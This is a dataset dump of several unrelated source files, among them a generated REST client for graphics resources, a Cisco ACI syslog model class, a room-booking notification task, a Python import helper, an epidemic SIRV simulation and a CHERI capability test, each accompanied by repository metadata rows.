returns the request thread.
"""
local_var_params = locals()
all_params = ['moid', 'graphics_controller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method patch_graphics_controller" %
key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `patch_graphics_controller`"
) # noqa: E501
# verify the required parameter 'graphics_controller' is set
if self.api_client.client_side_validation and (
'graphics_controller' not in local_var_params or # noqa: E501
local_var_params['graphics_controller'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `graphics_controller` when calling `patch_graphics_controller`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'graphics_controller' in local_var_params:
body_params = local_var_params['graphics_controller']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params[
'Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json',
'application/json-patch+json']) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/graphics/Controllers/{Moid}',
'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GraphicsController', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_graphics_card(self, moid, graphics_card,
**kwargs): # noqa: E501
"""Update a 'graphics.Card' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_graphics_card(moid, graphics_card, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param GraphicsCard graphics_card: The 'graphics.Card' resource to update. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: GraphicsCard
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_graphics_card_with_http_info(
moid, graphics_card, **kwargs) # noqa: E501
def update_graphics_card_with_http_info(self, moid, graphics_card,
**kwargs): # noqa: E501
"""Update a 'graphics.Card' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_graphics_card_with_http_info(moid, graphics_card, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param GraphicsCard graphics_card: The 'graphics.Card' resource to update. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(GraphicsCard, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid', 'graphics_card'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method update_graphics_card" % key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `update_graphics_card`"
) # noqa: E501
# verify the required parameter 'graphics_card' is set
if self.api_client.client_side_validation and (
'graphics_card' not in local_var_params or # noqa: E501
local_var_params['graphics_card'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `graphics_card` when calling `update_graphics_card`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'graphics_card' in local_var_params:
body_params = local_var_params['graphics_card']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params[
'Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json',
'application/json-patch+json']) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/graphics/Cards/{Moid}',
'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GraphicsCard', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_graphics_controller(self, moid, graphics_controller,
**kwargs): # noqa: E501
"""Update a 'graphics.Controller' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_graphics_controller(moid, graphics_controller, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param GraphicsController graphics_controller: The 'graphics.Controller' resource to update. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: GraphicsController
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_graphics_controller_with_http_info(
moid, graphics_controller, **kwargs) # noqa: E501
def update_graphics_controller_with_http_info(self, moid,
graphics_controller,
**kwargs): # noqa: E501
"""Update a 'graphics.Controller' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_graphics_controller_with_http_info(moid, graphics_controller, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param GraphicsController graphics_controller: The 'graphics.Controller' resource to update. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(GraphicsController, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid', 'graphics_controller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method update_graphics_controller" %
key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `update_graphics_controller`"
) # noqa: E501
# verify the required parameter 'graphics_controller' is set
if self.api_client.client_side_validation and (
'graphics_controller' not in local_var_params or # noqa: E501
local_var_params['graphics_controller'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `graphics_controller` when calling `update_graphics_controller`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'graphics_controller' in local_var_params:
body_params = local_var_params['graphics_controller']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params[
'Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json',
'application/json-patch+json']) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/graphics/Controllers/{Moid}',
'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GraphicsController', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
|
[
"[email protected]"
] | |
c11bc856f2ea6a25f92cda9810b7bb119e56cd2a
|
24fe1f54fee3a3df952ca26cce839cc18124357a
|
/servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/syslog/deststate.py
|
94dfe225d2349b2697c4c964c150c674e036028f
|
[] |
no_license
|
aperiyed/servicegraph-cloudcenter
|
4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff
|
9eb7975f2f6835e1c0528563a771526896306392
|
refs/heads/master
| 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 |
Python
|
UTF-8
|
Python
| false | false | 7,070 |
py
|
# coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class DestState(Mo):
"""
"""
meta = ClassMeta("cobra.model.syslog.DestState")
meta.moClassName = "syslogDestState"
meta.rnFormat = "destst-%(name)s"
meta.category = MoCategory.REGULAR
meta.label = "syslog Destination State"
meta.writeAccessMask = 0x1
meta.readAccessMask = 0x800000000000001
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Inst")
meta.childClasses.add("cobra.model.fault.Counts")
meta.childClasses.add("cobra.model.health.Inst")
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childClasses.add("cobra.model.syslog.LogMsg")
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Counts", "fltCnts"))
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Inst", "fault-"))
meta.childNamesAndRnPrefix.append(("cobra.model.health.Inst", "health"))
meta.childNamesAndRnPrefix.append(("cobra.model.syslog.LogMsg", "msg-"))
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.parentClasses.add("cobra.model.syslog.RemoteDest")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.pol.Obj")
meta.superClasses.add("cobra.model.pol.Comp")
meta.rnPrefixes = [
('destst-', True),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "descr", "descr", 5582, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "ip", "ip", 16267, PropCategory.REGULAR)
prop.label = "ip address"
prop.isImplicit = True
prop.isAdmin = True
prop.regex = ['^(?=.{0,255}$)[0-9A-Za-z:\\[\\]](\\[{0,1})(?:(?:[0-9A-Za-z]|-|:){0,61}[0-9A-Za-z])?(?:\\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-|:){0,61}[0-9A-Za-z])?)*\\.?(\\]{0,1})$']
meta.props.add("ip", prop)
prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "local"
prop._addConstant("implicit", "implicit", 4)
prop._addConstant("local", "local", 0)
prop._addConstant("policy", "policy", 1)
prop._addConstant("replica", "replica", 2)
prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3)
meta.props.add("lcOwn", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "monPolDn", "monPolDn", 16273, PropCategory.REGULAR)
prop.label = "Monitoring policy attached to this observable object"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("monPolDn", prop)
prop = PropMeta("str", "name", "name", 16268, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.isCreateOnly = True
prop.isNaming = True
prop.range = [(1, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "operState", "operState", 16265, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "unknown"
prop._addConstant("available", "available", 1)
prop._addConstant("errored", "errored", 2)
prop._addConstant("unknown", "unknown", 0)
meta.props.add("operState", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "totalBufferedMsgs", "totalBufferedMsgs", 17622, PropCategory.REGULAR)
prop.label = "total buffered messages"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("totalBufferedMsgs", prop)
prop = PropMeta("str", "totalDroppedMsgs", "totalDroppedMsgs", 17623, PropCategory.REGULAR)
prop.label = "total drooped messages"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("totalDroppedMsgs", prop)
prop = PropMeta("str", "vrfId", "vrfId", 16266, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("vrfId", prop)
meta.namingProps.append(getattr(meta.props, "name"))
# Deployment Meta
meta.deploymentQuery = True
meta.deploymentType = "Ancestor"
def __init__(self, parentMoOrDn, name, markDirty=True, **creationProps):
namingVals = [name]
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
|
[
"[email protected]"
] | |
c3b4cb6c2d7cbc8e5894e89e5b6a4b7727329f4d
|
80810054516ddc3fd93e916de4bf7e3e07d871b0
|
/1-books/book6_Python核心编程(第3版)/网络编程/functools_cmp_to_key.py
|
d16e6e1763906c6fdd78baf903356b25293a6ea7
|
[] |
no_license
|
TinyHandsome/BookStudy
|
df9ca668f2dd1b51b1e364c22bc531394a03eeae
|
69c9018bb70893f74a44e4df9f3d3e39467de3f6
|
refs/heads/master
| 2023-09-04T03:06:43.918259 | 2023-09-01T04:27:01 | 2023-09-01T04:27:01 | 184,217,837 | 18 | 17 | null | null | null | null |
UTF-8
|
Python
| false | false | 218 |
py
|
x = ['hello', 'world', 'ni']
x.sort(key=len)
print(x)
from functools import cmp_to_key
ll = [9, 2, 23, 1, 2]
print(sorted(ll, key=cmp_to_key(lambda x, y: y - x)))
print(sorted(ll, key=cmp_to_key(lambda x, y: x - y)))
|
[
"[email protected]"
] | |
1ec7f1e63501bcd0990480bde271f6da0909fd06
|
20f951bd927e4e5cde8ef7781813fcf0d51cc3ea
|
/fossir/modules/rb/tasks.py
|
a602ffdd2659a0af0aad35e4d26284196c247028
|
[] |
no_license
|
HodardCodeclub/SoftwareDevelopment
|
60a0fbab045cb1802925d4dd5012d5b030c272e0
|
6300f2fae830c0c2c73fe0afd9c684383bce63e5
|
refs/heads/master
| 2021-01-20T00:30:02.800383 | 2018-04-27T09:28:25 | 2018-04-27T09:28:25 | 101,277,325 | 0 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,611 |
py
|
from __future__ import unicode_literals
from datetime import date, datetime
from itertools import groupby
from operator import attrgetter
from celery.schedules import crontab
from sqlalchemy.orm import contains_eager
from fossir.core.celery import celery
from fossir.core.config import config
from fossir.core.db import db
from fossir.modules.rb import logger, rb_settings
from fossir.modules.rb.models.reservation_occurrences import ReservationOccurrence
from fossir.modules.rb.models.reservations import RepeatFrequency, Reservation
from fossir.modules.rb.models.rooms import Room
from fossir.modules.rb.notifications.reservation_occurrences import notify_upcoming_occurrences
from fossir.util.console import cformat
def _make_occurrence_date_filter():
_default = rb_settings.get('notification_before_days')
_default_weekly = rb_settings.get('notification_before_days_weekly')
_default_monthly = rb_settings.get('notification_before_days_monthly')
notification_before_days_room = db.case({RepeatFrequency.WEEK.value: Room.notification_before_days_weekly,
RepeatFrequency.MONTH.value: Room.notification_before_days_monthly},
else_=Room.notification_before_days, value=Reservation.repeat_frequency)
notification_before_days_default = db.case({RepeatFrequency.WEEK.value: _default_weekly,
RepeatFrequency.MONTH.value: _default_monthly},
else_=_default, value=Reservation.repeat_frequency)
notification_before_days = db.func.coalesce(notification_before_days_room, notification_before_days_default)
days_until_occurrence = db.cast(ReservationOccurrence.start_dt, db.Date) - date.today()
return days_until_occurrence == notification_before_days
def _print_occurrences(user, occurrences, _defaults={}, _overrides={}):
if not _defaults or not _overrides:
_defaults.update({RepeatFrequency.WEEK: rb_settings.get('notification_before_days_weekly'),
RepeatFrequency.MONTH: rb_settings.get('notification_before_days_monthly'),
RepeatFrequency.NEVER: rb_settings.get('notification_before_days'),
RepeatFrequency.DAY: rb_settings.get('notification_before_days')})
_overrides.update({RepeatFrequency.WEEK: lambda r: r.notification_before_days_weekly,
RepeatFrequency.MONTH: lambda r: r.notification_before_days_monthly,
RepeatFrequency.NEVER: lambda r: r.notification_before_days,
RepeatFrequency.DAY: lambda r: r.notification_before_days})
print cformat('%{grey!}*** {} ({}) ***').format(user.full_name, user.email)
for occ in occurrences:
default = _defaults[occ.reservation.repeat_frequency]
override = _overrides[occ.reservation.repeat_frequency](occ.reservation.room)
days = default if override is None else override
days_until = (occ.start_dt.date() - date.today()).days
print cformat(' * %{yellow}{}%{reset} %{green}{:5}%{reset} {} {} {} \t %{blue!}{}%{reset} {} ({})').format(
occ.start_dt.date(), occ.reservation.repeat_frequency.name,
days,
default if override is not None and override != default else ' ',
days_until,
occ.reservation.id,
occ.reservation.room.full_name,
occ.reservation.room.id
)
def _notify_occurrences(user, occurrences):
notify_upcoming_occurrences(user, occurrences)
for occ in occurrences:
occ.notification_sent = True
if occ.reservation.repeat_frequency == RepeatFrequency.DAY:
future_occurrences_query = (occ.reservation.occurrences
.filter(ReservationOccurrence.start_dt >= datetime.now()))
future_occurrences_query.update({'notification_sent': True})
@celery.periodic_task(name='roombooking_occurrences', run_every=crontab(minute='15', hour='8'))
def roombooking_occurrences(debug=False):
if not config.ENABLE_ROOMBOOKING:
logger.info('Notifications not sent because room booking is disabled')
return
if not rb_settings.get('notifications_enabled'):
logger.info('Notifications not sent because they are globally disabled')
return
occurrences = (ReservationOccurrence.query
.join(ReservationOccurrence.reservation)
.join(Reservation.room)
.filter(Room.is_active,
Room.notifications_enabled,
Reservation.is_accepted,
Reservation.booked_for_id.isnot(None),
ReservationOccurrence.is_valid,
ReservationOccurrence.start_dt >= datetime.now(),
~ReservationOccurrence.notification_sent,
_make_occurrence_date_filter())
.order_by(Reservation.booked_for_id, ReservationOccurrence.start_dt, Room.id)
.options(contains_eager('reservation').contains_eager('room'))
.all())
for user, user_occurrences in groupby(occurrences, key=attrgetter('reservation.booked_for_user')):
user_occurrences = list(user_occurrences)
if debug:
_print_occurrences(user, user_occurrences)
else:
_notify_occurrences(user, user_occurrences)
if not debug:
db.session.commit()
|
[
"[email protected]"
] | |
71017d23dc19d08ded41fb88369fda81d0999bc6
|
95565fbf6c2418e3a9e4e43e3982da0220dd6881
|
/satella/imports.py
|
b129afaeeb284639221004d7a9e78a638590461a
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
piotrmaslanka/satella
|
6adc649bcbcd3ba596650f9c0bfca15cb0ec3a96
|
8dd3d4741c11717f9473b7fdc4b242dfcade7aa9
|
refs/heads/develop
| 2023-06-23T03:38:19.810958 | 2023-06-08T16:11:39 | 2023-06-08T16:11:39 | 7,431,872 | 14 | 1 |
MIT
| 2023-01-07T22:14:14 | 2013-01-03T23:02:52 |
Python
|
UTF-8
|
Python
| false | false | 4,079 |
py
|
import importlib
import os
import pkgutil
import typing as tp
import warnings
__all__ = ['import_from', 'import_class']
def import_class(path: str) -> type:
"""
Import a class identified with given module path and class name
:param path: path, eg. subprocess.Popen
:return: imported class
"""
*path, classname = path.split('.')
import_path = '.'.join(path)
try:
return getattr(importlib.import_module(import_path), classname)
except AttributeError:
raise ImportError('%s not found in %s' % (classname, import_path))
def import_from(path: tp.List[str], package_prefix: str, all_: tp.List[str],
locals_: tp.Dict[str, tp.Any], recursive: bool = True,
fail_on_attributerror: bool = True, create_all: bool = True,
skip_single_underscores: bool = True,
skip_not_having_all: bool = False) -> None:
"""
Import everything from a given module. Append these module's all to.
This will examine __all__ of given module (if it has any, else it will just import everything
from it, which is probably a bad practice and will heavily pollute the namespace.
As a side effect, this will equip all of your packages with __all__.
:param path: module's __path__
:param package_prefix: package prefix to import from. Use __name__
:param all_: module's __all__ to append to
:param recursive: whether to import packages as well
:param fail_on_attributerror: whether to fail if a module reports something in their __all__
that is physically not there (ie. getattr() raised AttributeError
:param locals_: module's locals, obtain them by calling locals() in importing module's context
:param create_all: whether to create artificial __all__'s for modules that don't have them
:param skip_single_underscores: whether to refrain from importing things that are preceded with
a single underscore. Pertains to modules, as well as items
:param skip_not_having_all: skip module's not having an __all__ entry
:raise AttributeError: module's __all__ contained entry that was not in this module
"""
for importer, modname, is_pkg in pkgutil.walk_packages(path, onerror=lambda x: None):
if recursive and is_pkg:
if modname.startswith('_') and skip_single_underscores:
continue
module = importlib.import_module(package_prefix + '.' + modname)
try:
mod_all = module.__all__
except AttributeError:
if skip_not_having_all:
continue
mod_all = []
if create_all:
module.__all__ = mod_all
import_from([os.path.join(path[0], modname)], package_prefix + '.' + modname, mod_all,
module.__dict__, recursive=recursive,
fail_on_attributerror=fail_on_attributerror, create_all=create_all,
skip_not_having_all=skip_not_having_all,
skip_single_underscores=skip_single_underscores),
locals_[modname] = module
if modname not in all_:
all_.append(modname)
elif not is_pkg:
module = importlib.import_module(package_prefix + '.' + modname)
try:
package_ref = module.__all__
except AttributeError:
warnings.warn('Module %s does not contain __all__, enumerating it instead' %
(package_prefix + '.' + modname,), RuntimeWarning)
package_ref = dir(module)
for item in package_ref:
if item.startswith('_') and skip_single_underscores:
continue
try:
locals_[item] = getattr(module, item)
except AttributeError:
if fail_on_attributerror:
raise
else:
if item not in all_:
all_.append(item)
|
[
"[email protected]"
] | |
9891353f85074b0ed1070e11d7f0e2ad93f4360b
|
2903ac66369b6bd45889b12629d8c8e34e6089b3
|
/frappe_training/frappe_training/doctype/employee_info/employee_info.py
|
6af4951315fdbdbbedc4214387b383397fcc6ffd
|
[
"MIT"
] |
permissive
|
sivaranjanipalanivel/training
|
6fa50b5f97fb00894404fba11122599fd796623c
|
b177c56a319c07dc3467ce3113e332ecee9b81fa
|
refs/heads/master
| 2023-07-17T06:11:29.894363 | 2021-08-02T14:47:31 | 2021-08-02T14:47:31 | 391,987,470 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 265 |
py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2021, valiantsystems and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
# import frappe
from frappe.model.document import Document
class EmployeeINFO(Document):
pass
|
[
"[email protected]"
] | |
3db5cbd10cb5bc80f423f1f094adf67a4921cb7c
|
6b1be23ee65447932c387dc62f556ef8b2097154
|
/oblig3/SIRV_optimal_duration.py
|
469e098879045c7a4119170062e0db19908c8681
|
[] |
no_license
|
Linueks/inf1100
|
fd9fb4e0f338d387aa6d06430a5e484cc4037c8d
|
0a4a23144fd047bd3b51c44905e6c78754a053a6
|
refs/heads/main
| 2023-02-20T19:47:21.264189 | 2021-01-23T13:29:02 | 2021-01-23T13:29:02 | 332,216,763 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,769 |
py
|
from SIRV_varying_p import ProblemSIRV, SolverSIRV
import matplotlib.pyplot as plt
def optimal_duration():
maximum_I = []
time_points = range(0, 31, 1)
for time in time_points:
optimal_duration_problem = ProblemSIRV(p = lambda t: 0.1 if 6 <= t <= 6 + time else 0,
beta=0.0005, v=0.1, S0=1500, I0=1, R0=0, V0=0, T=60)
optimal_duration_sim = SolverSIRV(optimal_duration_problem, 0.5)
optimal_duration_sim.solve()
maximum_I.append(optimal_duration_sim.calc_max())
return maximum_I
def plot(values):
vaccination_time = []
maximum_infected = []
for vac_time, max_infected in enumerate(values):
vaccination_time.append(vac_time)
maximum_infected.append(max_infected)
plt.plot(vaccination_time, maximum_infected)
plt.show()
if __name__ == '__main__':
plot(optimal_duration())
print optimal_duration()
"""
The number of infected converges to 441 after 9 days of vaccination, when beta=0.0005
[Linueks@localhost oblig3]$ python SIRV_optimal_duration.py
[877.35589758894105, 764.25790220192289, 669.12776810141145, 591.69267415980698,
532.47707953201677, 490.46684184740479, 462.89122901853545, 447.73309998415226,
441.94995442418212, 441.57841906399926, 441.57841906399926, 441.57841906399926,
441.57841906399926, 441.57841906399926, 441.57841906399926, 441.57841906399926,
441.57841906399926, 441.57841906399926, 441.57841906399926, 441.57841906399926,
441.57841906399926, 441.57841906399926, 441.57841906399926, 441.57841906399926,
441.57841906399926, 441.57841906399926, 441.57841906399926, 441.57841906399926,
441.57841906399926, 441.57841906399926, 441.57841906399926]
"""
|
[
"[email protected]"
] | |
da568daf9fc7b5f7c51214728a20aade8ee98fae
|
7a17f06fc65106e793ad8e23612d32266f14b1dc
|
/tests/cp2/test_cp2_cjalr_delay_2.py
|
8940dcd76c1dc9c9d6d9555a7ba9951f47cf1f4c
|
[
"LicenseRef-scancode-beri-hw-sw-1.0"
] |
permissive
|
capt-hb/cheritest
|
19eda13df15aeba0003e550d97000827090f382a
|
dacc190eed70261e51a8a438203f680dc52a95c0
|
refs/heads/master
| 2023-01-19T20:05:40.020021 | 2020-06-11T07:51:26 | 2020-06-11T07:51:26 | 238,688,997 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,628 |
py
|
#-
# Copyright (c) 2018 Alex Richardson
# All rights reserved.
#
# This software was developed by the University of Cambridge Computer
# Laboratory as part of the Rigorous Engineering of Mainstream Systems (REMS)
# project, funded by EPSRC grant EP/K008528/1.
#
# @BERI_LICENSE_HEADER_START@
#
# Licensed to BERI Open Systems C.I.C. (BERI) under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. BERI licenses this
# file to you under the BERI Hardware-Software License, Version 1.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.beri-open-systems.org/legal/license-1-0.txt
#
# Unless required by applicable law or agreed to in writing, Work distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# @BERI_LICENSE_HEADER_END@
#
from beritest_tools import BaseBERITestCase, attr
@attr('capabilities')
class test_cp2_cjalr_delay_2(BaseBERITestCase):
def test_cjalr_return_cap_in_delay_slot(self):
'''Test that the new value of $c17 is available in the delay slot'''
self.assertRegisterEqual(self.MIPS.c4.offset, self.MIPS.t0 - 8, "return address offset wrong")
self.assertCapabilitiesEqual(self.MIPS.c4, self.MIPS.c17, "storing $c17 in the delay slot should yield the link address")
def test_cjalr_return_cap_after_delay_slot(self):
self.assertRegisterEqual(self.MIPS.c5.offset, self.MIPS.t0 - 8, "return address offset wrong")
